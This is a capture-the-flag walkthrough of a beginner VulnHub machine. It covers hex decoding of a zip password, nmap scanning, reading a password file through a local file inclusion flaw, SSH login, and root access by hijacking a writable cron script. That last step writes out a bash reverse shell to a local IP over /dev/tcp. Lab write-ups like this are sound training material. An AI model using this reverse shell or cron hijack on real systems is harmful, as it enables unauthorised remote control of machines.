In this article we are going to solve another boot2root challenge . It is a beginner level challenge and we can download this machine from vulnhub.
To complete this challenge we need 3 flags.
Flag 2 :
We downloaded the machine as usual but when we tried to unzip it says that it is password protected and we need to crack the password to get the .ova file , otherwise we can't continue with the machine . So we noticed a note from author of the machine in the description of the machine on vulnhub website
we try to crack this hash by using different hashing methods but failed here , So the things is that it comes out to be a hex string and if use any online tool to convert hex to text we get a string "deception1.1" and yes that is the password of the zip file.
so flag2 is 646563657074696f6e312e31
Flag 1 :
Now we successfully import the machine inside the virtual box and by using the command netdiscover utility we discover the IP of the machine
and then we run a nmap scan using the command nmap -v -sV <target_ip> , we found that only two ports are open 80 and 22 , So we decided to browse HTTP Service and we found a simple password strength checker website .
This is a simple website that can check password strength . if we type in 1234 then it gives us the message
Now lets try a proper combination to make a strong password . Now after using the password Haclabs!@1 we got a pop-up.
Pop-up says : 0000flagflagflagflag.php , this means this is a webpage and if we try to open this we have an error . Now if we look carefully at the line
Now if we observe this message carefully then it says that value of flag is 1 , means directory is 00001111.php,after opening the URL http://192.168.43.71/00001111.php we again see a pop-up.
now the pop says to find password.txt file , may be that file must have a hint or ca have something else.
We need to find password.txt file , we checked the source code of the webpage it says to use ?page= , means we can read the file it is a LFI vulnerability .
we are able to successfully read the password.txt file.
very clear from the line , means here we have to generate different combination to find the correct password and we are able to find the correct password as ya5hay ( not disclosing the actual command to get the correct combination )
Now we use this password to connect to SSH as user yash and yes we are in.
now we can find our flag in the home directory of user yash , other than this, for privilege escalation we noticed a file temp.sh that is running as cronjob by root and user yash has the permission to write this file .
we edit this file with a quick reverse shell as
bash -i >& /dev/tcp/192.168.1.13/9999 0>&1
and after 1 minute we have the root shell and can read the last flag inside /root directory.
This walkthrough is contributed by mike jovani , Contact him at : firstname.lastname@example.org